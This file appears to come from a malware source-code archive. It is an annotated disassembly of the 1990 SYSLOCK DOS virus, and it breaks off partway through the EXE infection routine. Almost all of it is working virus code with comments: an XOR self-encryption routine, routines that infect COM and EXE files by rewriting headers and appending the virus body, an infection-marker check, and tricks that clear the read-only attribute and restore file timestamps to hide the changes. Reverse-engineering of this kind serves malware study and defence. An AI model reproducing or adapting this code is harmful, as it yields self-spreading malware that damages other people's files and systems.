mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
1460 lines
46 KiB
NASM
1460 lines
46 KiB
NASM
|
; Virus SYSLOCK, version MACHOSOFT
|
||
|
; Founded in Poland in september 1990
|
||
|
;
|
||
|
; dissassembled by Andrzej Kadlof October 14, 1990
|
||
|
;
|
||
|
|
||
|
; special *.COM loader
|
||
|
|
||
|
0100 EB14 JMP 0116
|
||
|
|
||
|
0102 14 00 ; generation number
|
||
|
0104 00 00 ; ?? some COM info
|
||
|
0106 02 00
|
||
|
0108 00 00
|
||
|
010A 00 00
|
||
|
010C 00 00
|
||
|
010E 00 00
|
||
|
0110 39 28 ; virus signature (6 bytes)
|
||
|
0012 46 03
|
||
|
0014 03 01
|
||
|
|
||
|
; normalize CS:IP and jump to virus
|
||
|
|
||
|
0116 8CC9 MOV CX,CS
|
||
|
0118 8BD1 MOV DX,CX
|
||
|
011A 81C14F00 ADD CX,004F
|
||
|
011E 51 PUSH CX
|
||
|
011F 33C9 XOR CX,CX
|
||
|
0121 51 PUSH CX
|
||
|
0122 CB RETF
|
||
|
|
||
|
;--------------------------
|
||
|
; carrier program
|
||
|
;
|
||
|
; ....
|
||
|
;
|
||
|
;--------------------------
|
||
|
|
||
|
; COM entry point
|
||
|
|
||
|
0000 BB0100 MOV BX,0001 ; carrier is COM
|
||
|
0003 90 NOP
|
||
|
0004 EB16 JMP 001C
|
||
|
|
||
|
; EXE entry point
|
||
|
|
||
|
0006 BB0200 MOV BX,0002 ; carrier is EXE
|
||
|
0009 90 NOP
|
||
|
000A EB10 JMP 001C
|
||
|
|
||
|
000C 39 65 ; ??
|
||
|
000E 02 00 ; ??
|
||
|
0010 C1 07 ; year 1985
|
||
|
0012 01 01 ; january 1
|
||
|
0014 09 08 ; key for encryption/decryption
|
||
|
0016 00 00 ; ??
|
||
|
0018 08 00 ; new file size
|
||
|
001A 00 00 ; check sum for EXE file
|
||
|
|
||
|
; set registers DS, ES, SS, SP (virus uses private stack)
|
||
|
|
||
|
001C 8CD9 MOV CX,DS
|
||
|
001E 8CCF MOV DI,CS
|
||
|
0020 8EDF MOV DS,DI
|
||
|
0022 8EC7 MOV ES,DI
|
||
|
0024 8ED7 MOV SS,DI
|
||
|
0026 8BFC MOV DI,SP
|
||
|
0028 BCDD0D MOV SP,0DDD ; top of private stack
|
||
|
002B FC CLD
|
||
|
002C E80300 CALL 0032 ; encryption of virus code
|
||
|
002F E94806 JMP 067A
|
||
|
|
||
|
;-------------------------------
|
||
|
; encryption/decryption routine
|
||
|
|
||
|
0032 50 PUSH AX
|
||
|
0033 51 PUSH CX
|
||
|
0034 56 PUSH SI
|
||
|
0035 BE5900 MOV SI,0059 ; offset of decrypted part of virus
|
||
|
0038 B92608 MOV CX,0826 ; length of decrypted part
|
||
|
003B 90 NOP
|
||
|
003C D1E9 SHR CX,1 ; convert bytes to words
|
||
|
003E 8AE1 MOV AH,CL
|
||
|
0040 8AC1 MOV AL,CL
|
||
|
0042 33061400 XOR AX,[0014] ; key for decryption
|
||
|
0046 3104 XOR [SI],AX
|
||
|
0048 46 INC SI
|
||
|
0049 46 INC SI
|
||
|
004A E2F2 LOOP 003E
|
||
|
|
||
|
004C 5E POP SI
|
||
|
004D 59 POP CX
|
||
|
004E 58 POP AX
|
||
|
004F C3 RET
|
||
|
|
||
|
;--------------------------------------------
|
||
|
; decrypt virus, write to disk, encrypt back
|
||
|
|
||
|
0050 E8DFFF CALL 0032 ; encryption/decryption
|
||
|
0053 CD21 INT 21
|
||
|
0055 E8DAFF CALL 0032 ; encryption/decryption
|
||
|
0058 C3 RET
|
||
|
|
||
|
;******************************************
|
||
|
; in file rest of virus code is decrypted
|
||
|
|
||
|
;--------------------------------
|
||
|
; get random number less than AX
|
||
|
|
||
|
0059 51 PUSH CX
|
||
|
005A 52 PUSH DX
|
||
|
005B 56 PUSH SI
|
||
|
005C 8BF0 MOV SI,AX
|
||
|
005E 46 INC SI
|
||
|
005F B42C MOV AH,2C ; get time
|
||
|
0061 CD21 INT 21
|
||
|
|
||
|
0063 8BC1 MOV AX,CX ; hour, minute
|
||
|
0065 03C2 ADD AX,DX ; seconds, hundredths of seconds
|
||
|
0067 33D2 XOR DX,DX ; prepare division
|
||
|
0069 F7FE IDIV SI
|
||
|
006B 8BC2 MOV AX,DX ; rest of division
|
||
|
006D 5E POP SI
|
||
|
006E 5A POP DX
|
||
|
006F 59 POP CX
|
||
|
0070 C3 RET
|
||
|
|
||
|
;******************************
|
||
|
; dead code (never called)
|
||
|
|
||
|
;--------------------------------
|
||
|
; display in hex number from AX
|
||
|
|
||
|
0071 52 PUSH DX
|
||
|
0072 8AD4 MOV DL,AH
|
||
|
0074 E80700 CALL 007E ; display in hex byte from DL
|
||
|
0077 8AD0 MOV DL,AL
|
||
|
0079 E80200 CALL 007E ; display in hex byte from DL
|
||
|
007C 5A POP DX
|
||
|
007D C3 RET
|
||
|
|
||
|
;-------------------------------
|
||
|
; display in hex byte from DL
|
||
|
|
||
|
007E 53 PUSH BX
|
||
|
007F 51 PUSH CX
|
||
|
0080 8ADA MOV BL,DL ; extract high nible
|
||
|
0082 B104 MOV CL,04
|
||
|
0084 D2EB SHR BL,CL
|
||
|
0086 E80800 CALL 0091 ; display
|
||
|
0089 8ADA MOV BL,DL ; low nible
|
||
|
008B E80300 CALL 0091 ; display
|
||
|
008E 59 POP CX
|
||
|
008F 5B POP BX
|
||
|
0090 C3 RET
|
||
|
|
||
|
;---------------------------
|
||
|
; display hex digit from BX
|
||
|
|
||
|
0091 50 PUSH AX
|
||
|
0092 53 PUSH BX
|
||
|
0093 52 PUSH DX
|
||
|
0094 81E30F00 AND BX,000F
|
||
|
0098 8A97A400 MOV DL,[BX+00A4] ; convert to hex
|
||
|
009C B402 MOV AH,02 ; display character
|
||
|
009E CD21 INT 21
|
||
|
00A0 5A POP DX
|
||
|
00A1 5B POP BX
|
||
|
00A2 58 POP AX
|
||
|
00A3 C3 RET
|
||
|
|
||
|
; hex digits
|
||
|
|
||
|
00A4 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 46 ; 0123456789ABCDEF
|
||
|
|
||
|
; end of dead code
|
||
|
;*************************
|
||
|
|
||
|
;----------------------
|
||
|
; get DOS wersion
|
||
|
|
||
|
00B4 B430 MOV AH,30
|
||
|
00B6 CD21 INT 21
|
||
|
00B8 C3 RET
|
||
|
|
||
|
;--------------------------------------------
|
||
|
; prepare parameters for moving file pointer
|
||
|
|
||
|
00B9 33C9 XOR CX,CX
|
||
|
00BB BA0400 MOV DX,0004
|
||
|
00BE 90 NOP
|
||
|
00BF F8 CLC
|
||
|
00C0 C3 RET
|
||
|
|
||
|
;---------------------------------------------------
|
||
|
; read EXE file header and find entry point in file
|
||
|
|
||
|
00C1 50 PUSH AX
|
||
|
00C2 53 PUSH BX
|
||
|
00C3 B43F MOV AH,3F ; read file
|
||
|
00C5 BA5409 MOV DX,0954 ; to DS:DX
|
||
|
00C8 B91C00 MOV CX,001C ; number of bytes
|
||
|
00CB 90 NOP
|
||
|
00CC 8B1E5209 MOV BX,[0952] ; file handle
|
||
|
00D0 CD21 INT 21
|
||
|
00D2 721C JB 00F0
|
||
|
|
||
|
00D4 8B165C09 MOV DX,[095C] ; header size in paragraphs
|
||
|
00D8 03166A09 ADD DX,[096A] ; CS
|
||
|
00DC 33C0 XOR AX,AX ; prepare for multiplication
|
||
|
00DE B90400 MOV CX,0004
|
||
|
|
||
|
; multiple DX by 16, result store in AX
|
||
|
|
||
|
00E1 D1E2 SHL DX,1
|
||
|
00E3 D1D0 RCL AX,1
|
||
|
00E5 E2FA LOOP 00E1
|
||
|
|
||
|
00E7 8BC8 MOV CX,AX
|
||
|
00E9 81C21600 ADD DX,0016
|
||
|
00ED 83D100 ADC CX,+00
|
||
|
00F0 5B POP BX
|
||
|
00F1 58 POP AX
|
||
|
00F2 C3 RET
|
||
|
|
||
|
;-------------------------------------------------------------------
|
||
|
; if DOS version 3.x then change info field 0004 in carrier on disk
|
||
|
|
||
|
00F3 50 PUSH AX
|
||
|
00F4 53 PUSH BX
|
||
|
00F5 51 PUSH CX
|
||
|
00F6 52 PUSH DX
|
||
|
00F7 57 PUSH DI
|
||
|
00F8 56 PUSH SI
|
||
|
00F9 0BDB OR BX,BX
|
||
|
00FB 7503 JNZ 0100
|
||
|
|
||
|
00FD EB71 JMP 0170 ; exit
|
||
|
00FF 90 NOP
|
||
|
|
||
|
0100 A3B808 MOV [08B8],AX ; ??
|
||
|
0103 E8AEFF CALL 00B4 ; get DOS wersion
|
||
|
0106 3C03 CMP AL,03
|
||
|
0108 7D03 JGE 010D
|
||
|
|
||
|
010A EB50 JMP 015C ; house keeping end exit
|
||
|
010C 90 NOP
|
||
|
|
||
|
; DOS 3.x, look for full path to carrier
|
||
|
|
||
|
010D 8E06B208 MOV ES,[08B2] ; segment of carrier
|
||
|
0111 26 ES:
|
||
|
0112 8E062C00 MOV ES,[002C] ; segment of enviroment block
|
||
|
0116 33C0 XOR AX,AX
|
||
|
0118 8BC8 MOV CX,AX
|
||
|
011A F7D1 NOT CX ; FFFFh maximum size of enviroment
|
||
|
011C 8BF8 MOV DI,AX ; beginning of enviroment
|
||
|
|
||
|
011E F2 REPNZ ; find end of enviroment
|
||
|
011F AE SCASB
|
||
|
0120 26 ES:
|
||
|
0121 3805 CMP [DI],AL
|
||
|
0123 75F9 JNZ 011E
|
||
|
|
||
|
0125 83C703 ADD DI,+03 ; point at path to carrier
|
||
|
0128 8BD7 MOV DX,DI
|
||
|
012A E8B300 CALL 01E0 ; get file parameters and open it
|
||
|
012D 722D JB 015C ; house keeping end exit
|
||
|
|
||
|
012F 813EB6080100 CMP WORD PTR [08B6],0001 ; COM?
|
||
|
0135 7405 JZ 013C ; yes
|
||
|
|
||
|
0137 E887FF CALL 00C1 ; find entry point in EXE carrier
|
||
|
013A EB03 JMP 013F
|
||
|
|
||
|
013C E87AFF CALL 00B9 ; DX:CX = 4:0, CLC, address in COM
|
||
|
|
||
|
013F 721B JB 015C ; house keeping end exit
|
||
|
|
||
|
0141 B80042 MOV AX,4200 ; move file pointer
|
||
|
0144 8B1E5209 MOV BX,[0952] ; file handle
|
||
|
0148 CD21 INT 21
|
||
|
014A 7210 JB 015C ; house keeping end exit
|
||
|
|
||
|
014C B440 MOV AH,40 ; write file
|
||
|
014E BAB808 MOV DX,08B8 ; buffer
|
||
|
0151 B90200 MOV CX,0002 ; number of bytes
|
||
|
0154 8B1E5209 MOV BX,[0952] ; file handle
|
||
|
0158 CD21 INT 21
|
||
|
015A 7300 JAE 015C ; ? what for ?
|
||
|
|
||
|
015C 9C PUSHF ; house keeping end exit
|
||
|
015D 8BD7 MOV DX,DI ; file name
|
||
|
015F 8E06B208 MOV ES,[08B2] ; carrier segment
|
||
|
0163 26 ES:
|
||
|
0164 8E062C00 MOV ES,[002C] ; enviroment block
|
||
|
0168 E8C100 CALL 022C ; restore file parameters and close it
|
||
|
|
||
|
016B 8CDE MOV SI,DS
|
||
|
016D 8EC6 MOV ES,SI
|
||
|
016F 9D POPF
|
||
|
|
||
|
0170 5E POP SI
|
||
|
0171 5F POP DI
|
||
|
0172 5A POP DX
|
||
|
0173 59 POP CX
|
||
|
0174 5B POP BX
|
||
|
0175 58 POP AX
|
||
|
0176 C3 RET
|
||
|
|
||
|
;-----------------------------------
|
||
|
; analyse DTA file name
|
||
|
; on exit AX = 3 - subdirectory
|
||
|
; 2 - EXE
|
||
|
; 1 - COM
|
||
|
|
||
|
0177 53 PUSH BX
|
||
|
0178 56 PUSH SI
|
||
|
0179 B80000 MOV AX,0000
|
||
|
017C 8A1E3B09 MOV BL,[093B] ; get attributes
|
||
|
0180 80E310 AND BL,10 ; directory?
|
||
|
0183 740D JZ 0192 ; no
|
||
|
|
||
|
0185 803E44092E CMP BYTE PTR [0944],2E ; current diretory
|
||
|
018A 7451 JZ 01DD ; yes
|
||
|
|
||
|
018C B80300 MOV AX,0003 ; subdir
|
||
|
018F EB4C JMP 01DD ; exit
|
||
|
0191 90 NOP
|
||
|
|
||
|
0192 8A1E3B09 MOV BL,[093B] ; attribute
|
||
|
0196 80E3C0 AND BL,C0 ; unused bits
|
||
|
0199 7542 JNZ 01DD ; exit
|
||
|
|
||
|
019B BE4409 MOV SI,0944 ; file name
|
||
|
|
||
|
; locate extension
|
||
|
|
||
|
019E 803C2E CMP BYTE PTR [SI],2E ; is extension present
|
||
|
01A1 740D JZ 01B0
|
||
|
|
||
|
01A3 803C20 CMP BYTE PTR [SI],20 ; empty
|
||
|
01A6 7435 JZ 01DD
|
||
|
|
||
|
01A8 803C00 CMP BYTE PTR [SI],00 ; empty
|
||
|
01AB 7430 JZ 01DD
|
||
|
|
||
|
01AD 46 INC SI ; next character
|
||
|
01AE EBEE JMP 019E
|
||
|
|
||
|
; is it COM?
|
||
|
|
||
|
01B0 807C0143 CMP BYTE PTR [SI+01],43 ; 'C'
|
||
|
01B4 7512 JNZ 01C8
|
||
|
|
||
|
01B6 807C024F CMP BYTE PTR [SI+02],4F ; 'O'
|
||
|
01BA 750C JNZ 01C8
|
||
|
|
||
|
01BC 807C034D CMP BYTE PTR [SI+03],4D ; 'M'
|
||
|
01C0 7506 JNZ 01C8
|
||
|
|
||
|
01C2 B80100 MOV AX,0001 ; COM
|
||
|
01C5 EB16 JMP 01DD
|
||
|
01C7 90 NOP
|
||
|
|
||
|
; is it EXE?
|
||
|
|
||
|
01C8 807C0145 CMP BYTE PTR [SI+01],45 ; 'E'
|
||
|
01CC 750F JNZ 01DD
|
||
|
|
||
|
01CE 807C0258 CMP BYTE PTR [SI+02],58 ; 'X'
|
||
|
01D2 7509 JNZ 01DD
|
||
|
|
||
|
01D4 807C0345 CMP BYTE PTR [SI+03],45 ; 'E'
|
||
|
01D8 7503 JNZ 01DD
|
||
|
|
||
|
01DA B80200 MOV AX,0002 ; EXE
|
||
|
|
||
|
; exit
|
||
|
|
||
|
01DD 5E POP SI
|
||
|
01DE 5B POP BX
|
||
|
01DF C3 RET
|
||
|
|
||
|
;-------------------------------------------------
|
||
|
; get and store file attributes, date/time stamp,
|
||
|
; clear read only and open file
|
||
|
|
||
|
01E0 50 PUSH AX
|
||
|
01E1 53 PUSH BX
|
||
|
01E2 51 PUSH CX
|
||
|
01E3 52 PUSH DX
|
||
|
01E4 1E PUSH DS
|
||
|
01E5 8CC0 MOV AX,ES
|
||
|
01E7 8ED8 MOV DS,AX
|
||
|
01E9 B80043 MOV AX,4300 ; get file attributes
|
||
|
01EC CD21 INT 21
|
||
|
|
||
|
01EE 1F POP DS
|
||
|
01EF 7236 JB 0227
|
||
|
|
||
|
01F1 890E2009 MOV [0920],CX ; store attributes
|
||
|
01F5 1E PUSH DS
|
||
|
01F6 8CC0 MOV AX,ES
|
||
|
01F8 8ED8 MOV DS,AX
|
||
|
01FA 81E1FEFF AND CX,FFFE ; clear read only
|
||
|
01FE B80143 MOV AX,4301 ; set file attribute
|
||
|
0201 CD21 INT 21
|
||
|
|
||
|
0203 1F POP DS
|
||
|
0204 7221 JB 0227
|
||
|
|
||
|
0206 1E PUSH DS
|
||
|
0207 8CC0 MOV AX,ES
|
||
|
0209 8ED8 MOV DS,AX
|
||
|
020B B8023D MOV AX,3D02 ; open file
|
||
|
020E CD21 INT 21
|
||
|
|
||
|
0210 1F POP DS
|
||
|
0211 7214 JB 0227
|
||
|
|
||
|
0213 8BD8 MOV BX,AX ; file handle
|
||
|
0215 A35209 MOV [0952],AX ; store it
|
||
|
0218 B80057 MOV AX,5700 ; get file date/time stamp
|
||
|
021B CD21 INT 21
|
||
|
021D 7208 JB 0227
|
||
|
|
||
|
021F 89162209 MOV [0922],DX ; store date stamp
|
||
|
0223 890E2409 MOV [0924],CX ; store time stamp
|
||
|
|
||
|
0227 5A POP DX
|
||
|
0228 59 POP CX
|
||
|
0229 5B POP BX
|
||
|
022A 58 POP AX
|
||
|
022B C3 RET
|
||
|
|
||
|
;---------------------------------------------
|
||
|
; restore file parameters and close it
|
||
|
; file name address is given in DS:DX
|
||
|
|
||
|
022C 50 PUSH AX
|
||
|
022D 53 PUSH BX
|
||
|
022E 51 PUSH CX
|
||
|
022F 52 PUSH DX
|
||
|
0230 56 PUSH SI
|
||
|
0231 8BF2 MOV SI,DX
|
||
|
0233 8B1E5209 MOV BX,[0952] ; file handle
|
||
|
0237 8B0E2409 MOV CX,[0924] ; file time stamp
|
||
|
023B 8B162209 MOV DX,[0922] ; file date stamp
|
||
|
023F B80157 MOV AX,5701 ; set file date/time stamp
|
||
|
0242 CD21 INT 21
|
||
|
0244 7217 JB 025D
|
||
|
|
||
|
0246 B43E MOV AH,3E ; close file
|
||
|
0248 CD21 INT 21
|
||
|
024A 7211 JB 025D
|
||
|
|
||
|
024C 1E PUSH DS
|
||
|
024D 8B0E2009 MOV CX,[0920] ; file attributes
|
||
|
0251 8CC0 MOV AX,ES
|
||
|
0253 8ED8 MOV DS,AX
|
||
|
0255 8BD6 MOV DX,SI
|
||
|
0257 B80143 MOV AX,4301 ; set file attributes
|
||
|
025A CD21 INT 21
|
||
|
|
||
|
025C 1F POP DS
|
||
|
025D 5E POP SI
|
||
|
025E 5A POP DX
|
||
|
025F 59 POP CX
|
||
|
0260 5B POP BX
|
||
|
0261 58 POP AX
|
||
|
0262 C3 RET
|
||
|
|
||
|
;-----------------------
|
||
|
; add file name to path
|
||
|
|
||
|
0263 50 PUSH AX
|
||
|
0264 51 PUSH CX
|
||
|
0265 52 PUSH DX
|
||
|
0266 57 PUSH DI
|
||
|
0267 56 PUSH SI
|
||
|
0268 BFBA08 MOV DI,08BA ; path
|
||
|
026B 8BCF MOV CX,DI
|
||
|
026D 32C0 XOR AL,AL
|
||
|
026F F2 REPNZ
|
||
|
0270 AE SCASB
|
||
|
0271 83EF04 SUB DI,+04
|
||
|
0274 BE4409 MOV SI,0944
|
||
|
0277 B90D00 MOV CX,000D
|
||
|
027A F3 REPZ
|
||
|
027B A4 MOVSB
|
||
|
027C 5F POP DI
|
||
|
027D 5E POP SI
|
||
|
027E 5A POP DX
|
||
|
027F 59 POP CX
|
||
|
0280 58 POP AX
|
||
|
0281 C3 RET
|
||
|
|
||
|
;---------------------------------------------
|
||
|
; move file pointer at the beginning of file
|
||
|
|
||
|
0282 50 PUSH AX
|
||
|
0283 53 PUSH BX
|
||
|
0284 51 PUSH CX
|
||
|
0285 52 PUSH DX
|
||
|
0286 B80042 MOV AX,4200 ; move file pointer
|
||
|
0289 33C9 XOR CX,CX ; offset from beginning
|
||
|
028B 33D2 XOR DX,DX
|
||
|
028D 8B1E5209 MOV BX,[0952] ; file handle
|
||
|
0291 CD21 INT 21
|
||
|
0293 5A POP DX
|
||
|
0294 59 POP CX
|
||
|
0295 5B POP BX
|
||
|
0296 58 POP AX
|
||
|
0297 C3 RET
|
||
|
|
||
|
;-------------------------------------------------------------------
|
||
|
; find how many bytes should be added to file to get multiple of 16
|
||
|
|
||
|
0298 50 PUSH AX
|
||
|
0299 53 PUSH BX
|
||
|
029A 51 PUSH CX
|
||
|
029B 52 PUSH DX
|
||
|
029C B80242 MOV AX,4202 ; move file pointer
|
||
|
029F 33C9 XOR CX,CX
|
||
|
02A1 8B1E4009 MOV BX,[0940] ; file size (low word)
|
||
|
02A5 81E30F00 AND BX,000F
|
||
|
02A9 BA1000 MOV DX,0010
|
||
|
02AC 2BD3 SUB DX,BX
|
||
|
02AE 81E20F00 AND DX,000F
|
||
|
02B2 89161800 MOV [0018],DX
|
||
|
02B6 8B1E5209 MOV BX,[0952] ; file handle
|
||
|
02BA CD21 INT 21
|
||
|
|
||
|
02BC 5A POP DX
|
||
|
02BD 59 POP CX
|
||
|
02BE 5B POP BX
|
||
|
02BF 58 POP AX
|
||
|
02C0 C3 RET
|
||
|
|
||
|
;------------------------
|
||
|
; infection of COM file
|
||
|
|
||
|
02C1 50 PUSH AX
|
||
|
02C2 53 PUSH BX
|
||
|
02C3 51 PUSH CX
|
||
|
02C4 52 PUSH DX
|
||
|
02C5 57 PUSH DI
|
||
|
02C6 56 PUSH SI
|
||
|
02C7 BE2108 MOV SI,0821
|
||
|
02CA BF7F08 MOV DI,087F
|
||
|
02CD B92300 MOV CX,0023
|
||
|
02D0 90 NOP
|
||
|
02D1 F3 REPZ
|
||
|
02D2 A4 MOVSB
|
||
|
02D3 833E420900 CMP WORD PTR [0942],+00 ; file size (high word)
|
||
|
02D8 7403 JZ 02DD
|
||
|
|
||
|
02DA E98500 JMP 0362 ; file too big, exit
|
||
|
|
||
|
02DD 813E400900F0 CMP WORD PTR [0940],F000 ; file size (low word)
|
||
|
02E3 7204 JB 02E9
|
||
|
|
||
|
02E5 F9 STC
|
||
|
02E6 EB7A JMP 0362 ; file too big, exit
|
||
|
02E8 90 NOP
|
||
|
|
||
|
02E9 B43F MOV AH,3F ; read file
|
||
|
02EB BA2108 MOV DX,0821 ; buffer
|
||
|
02EE B92300 MOV CX,0023 ; number of bytes
|
||
|
02F1 90 NOP
|
||
|
02F2 8B1E5209 MOV BX,[0952] ; file handle
|
||
|
02F6 CD21 INT 21
|
||
|
02F8 7303 JAE 02FD
|
||
|
|
||
|
02FA EB66 JMP 0362 ; error, exit
|
||
|
02FC 90 NOP
|
||
|
|
||
|
02FD 813E21084D5A CMP WORD PTR [0821],5A4D ; EXE marker
|
||
|
0303 7504 JNZ 0309
|
||
|
|
||
|
0305 F9 STC
|
||
|
0306 EB5A JMP 0362 ; false COM, exit
|
||
|
0308 90 NOP
|
||
|
|
||
|
0309 BE0E08 MOV SI,080E ; compare 6 bytes against virus code
|
||
|
030C BF2108 MOV DI,0821 ; destination
|
||
|
030F 81C71000 ADD DI,0010
|
||
|
0313 B90600 MOV CX,0006 ; length
|
||
|
0316 90 NOP
|
||
|
0317 F3 REPZ
|
||
|
0318 A6 CMPSB
|
||
|
0319 7504 JNZ 031F
|
||
|
|
||
|
031B F9 STC
|
||
|
031C EB44 JMP 0362 ; infected, exit
|
||
|
031E 90 NOP
|
||
|
|
||
|
; adjust length to 16 multiple
|
||
|
|
||
|
031F A14009 MOV AX,[0940] ; file size (low word)
|
||
|
0322 050001 ADD AX,0100
|
||
|
0325 50 PUSH AX
|
||
|
0326 250F00 AND AX,000F
|
||
|
0329 58 POP AX
|
||
|
032A 7406 JZ 0332
|
||
|
|
||
|
032C 25F0FF AND AX,FFF0
|
||
|
032F 051000 ADD AX,0010
|
||
|
0332 B104 MOV CL,04
|
||
|
0334 D3E8 SHR AX,CL
|
||
|
0336 A31A08 MOV [081A],AX ; modyfy *.COM loader
|
||
|
0339 E846FF CALL 0282 ; move file pointer at the beginning of file
|
||
|
033C 7224 JB 0362 ; exit
|
||
|
|
||
|
033E B440 MOV AH,40 ; write file
|
||
|
0340 BAFE07 MOV DX,07FE ; new *.COM loader
|
||
|
0343 B92300 MOV CX,0023 ; length
|
||
|
0346 90 NOP
|
||
|
0347 8B1E5209 MOV BX,[0952] ; file handle
|
||
|
034B CD21 INT 21
|
||
|
034D 7213 JB 0362 ; exit
|
||
|
|
||
|
034F E846FF CALL 0298 ; number of bytes to get multiple of 16
|
||
|
0352 720E JB 0362
|
||
|
|
||
|
0354 B440 MOV AH,40 ; write file
|
||
|
0356 33D2 XOR DX,DX
|
||
|
0358 B9DF0D MOV CX,0DDF ; virus size
|
||
|
035B 8B1E5209 MOV BX,[0952] ; file handle
|
||
|
035F E8EEFC CALL 0050 ; decrypt virus, write to disk, encrypt back
|
||
|
|
||
|
0362 9C PUSHF
|
||
|
0363 BE7F08 MOV SI,087F
|
||
|
0366 BF2108 MOV DI,0821
|
||
|
0369 B92300 MOV CX,0023
|
||
|
036C 90 NOP
|
||
|
036D F3 REPZ
|
||
|
036E A4 MOVSB
|
||
|
036F 9D POPF
|
||
|
0370 5E POP SI
|
||
|
0371 5F POP DI
|
||
|
0372 5A POP DX
|
||
|
0373 59 POP CX
|
||
|
0374 5B POP BX
|
||
|
0375 58 POP AX
|
||
|
0376 C3 RET
|
||
|
|
||
|
;-----------------
|
||
|
; infect EXE file
|
||
|
|
||
|
0377 50 PUSH AX
|
||
|
0378 53 PUSH BX
|
||
|
0379 51 PUSH CX
|
||
|
037A 52 PUSH DX
|
||
|
037B 57 PUSH DI
|
||
|
037C 56 PUSH SI
|
||
|
037D BE4408 MOV SI,0844
|
||
|
0380 BFA208 MOV DI,08A2
|
||
|
0383 B90A00 MOV CX,000A
|
||
|
0386 90 NOP
|
||
|
0387 F3 REPZ
|
||
|
0388 A4 MOVSB
|
||
|
0389 A11600 MOV AX,[0016] ; ??
|
||
|
038C A3AC08 MOV [08AC],AX ; ??
|
||
|
038F C70616000000 MOV WORD PTR [0016],0000 ; ??
|
||
|
0395 B43F MOV AH,3F ; read file
|
||
|
0397 BA5409 MOV DX,0954 ; buffer
|
||
|
039A B91C00 MOV CX,001C ; header size
|
||
|
039D 90 NOP
|
||
|
039E 8B1E5209 MOV BX,[0952] ; file handle
|
||
|
03A2 CD21 INT 21
|
||
|
|
||
|
03A4 7302 JAE 03A8
|
||
|
|
||
|
03A6 EBBA JMP 0362 ; errors, exit
|
||
|
|
||
|
03A8 A16609 MOV AX,[0966] ; EXE file check sum
|
||
|
03AB A31A00 MOV [001A],AX ; store it
|
||
|
03AE 3DB67C CMP AX,7CB6 ; virus signature ??
|
||
|
03B1 7504 JNZ 03B7
|
||
|
|
||
|
03B3 F9 STC
|
||
|
|
||
|
03B4 E9CD00 JMP 0484 ; infected, exit
|
||
|
|
||
|
03B7 A15809 MOV AX,[0958] ; page count
|
||
|
03BA 48 DEC AX
|
||
|
03BB BA0002 MOV DX,0200 ; size of page
|
||
|
03BE F7E2 MUL DX
|
||
|
03C0 03065609 ADD AX,[0956] ; part page
|
||
|
03C4 83D200 ADC DX,+00
|
||
|
03C7 3B164209 CMP DX,[0942] ; file size (high word)
|
||
|
03CB 7506 JNZ 03D3
|
||
|
|
||
|
03CD 3B064009 CMP AX,[0940] ; file size (low word)
|
||
|
03D1 7404 JZ 03D7
|
||
|
|
||
|
03D3 F9 STC
|
||
|
03D4 E9AD00 JMP 0484 ; exit
|
||
|
|
||
|
03D7 A16A09 MOV AX,[096A] ; CS
|
||
|
03DA A34408 MOV [0844],AX
|
||
|
03DD A16809 MOV AX,[0968] ; IP
|
||
|
03E0 A34608 MOV [0846],AX
|
||
|
03E3 A16209 MOV AX,[0962] ; SS
|
||
|
03E6 A34808 MOV [0848],AX
|
||
|
03E9 A16409 MOV AX,[0964] ; SP
|
||
|
03EC A34A08 MOV [084A],AX
|
||
|
03EF C70668090600 MOV WORD PTR [0968],0006 ; IP
|
||
|
03F5 C7066409DD0D MOV WORD PTR [0964],0DDD ; SP
|
||
|
03FB 8B1E4209 MOV BX,[0942] ; file size (high word)
|
||
|
03FF 8B164009 MOV DX,[0940] ; file size (low word)
|
||
|
0403 50 PUSH AX
|
||
|
0404 8BC2 MOV AX,DX
|
||
|
0406 250F00 AND AX,000F
|
||
|
0409 58 POP AX
|
||
|
040A 7407 JZ 0413
|
||
|
|
||
|
040C 81E2F0FF AND DX,FFF0
|
||
|
0410 83C210 ADD DX,+10
|
||
|
0413 83D300 ADC BX,+00
|
||
|
0416 B90400 MOV CX,0004
|
||
|
0419 D1EB SHR BX,1
|
||
|
041B D1DA RCR DX,1
|
||
|
041D E2FA LOOP 0419
|
||
|
|
||
|
041F 2B165C09 SUB DX,[095C] ; header size
|
||
|
0423 89166A09 MOV [096A],DX ; CS
|
||
|
0427 89166209 MOV [0962],DX ; SS
|
||
|
042B 89164C08 MOV [084C],DX ; virus position in file
|
||
|
042F A15609 MOV AX,[0956] ; part page
|
||
|
0432 50 PUSH AX
|
||
|
0433 250F00 AND AX,000F
|
||
|
0436 58 POP AX
|
||
|
0437 7406 JZ 043F
|
||
|
|
||
|
0439 25F0FF AND AX,FFF0
|
||
|
043C 051000 ADD AX,0010
|
||
|
043F 05DF0D ADD AX,0DDF
|
||
|
0442 8BD8 MOV BX,AX
|
||
|
0444 25FF01 AND AX,01FF
|
||
|
0447 7503 JNZ 044C
|
||
|
|
||
|
0449 B80002 MOV AX,0200
|
||
|
044C A35609 MOV [0956],AX ; part page
|
||
|
044F B109 MOV CL,09
|
||
|
0451 D3EB SHR BX,CL
|
||
|
0453 011E5809 ADD [0958],BX ; page count
|
||
|
0457 C7066609B67C MOV WORD PTR [0966],7CB6 ; check sum
|
||
|
|
||
|
045D E822FE CALL 0282 ; move file pointer at the beginning of file
|
||
|
|
||
|
0460 7222 JB 0484 ; exit
|
||
|
|
||
|
; write new EXE header to file
|
||
|
|
||
|
0462 B440 MOV AH,40 ; write file
|
||
|
0464 BA5409 MOV DX,0954 ; new header
|
||
|
0467 B91C00 MOV CX,001C ; size of EXE header
|
||
|
046A 90 NOP
|
||
|
046B 8B1E5209 MOV BX,[0952] ; file handle
|
||
|
046F CD21 INT 21
|
||
|
|
||
|
0471 7211 JB 0484 ; exit
|
||
|
|
||
|
0473 E822FE CALL 0298 ; number of bytes to get multiple of 16
|
||
|
|
||
|
; write virus body to file
|
||
|
|
||
|
0476 B440 MOV AH,40 ; write file
|
||
|
0478 33D2 XOR DX,DX
|
||
|
047A B9DF0D MOV CX,0DDF ; virus size
|
||
|
047D 8B1E5209 MOV BX,[0952] ; file handle
|
||
|
0481 E8CCFB CALL 0050 ; decrypt, write. encrypt
|
||
|
|
||
|
0484 BEA208 MOV SI,08A2
|
||
|
0487 BF4408 MOV DI,0844
|
||
|
048A B90A00 MOV CX,000A
|
||
|
048D 90 NOP
|
||
|
048E F3 REPZ
|
||
|
048F A4 MOVSB
|
||
|
0490 A1AC08 MOV AX,[08AC] ;
|
||
|
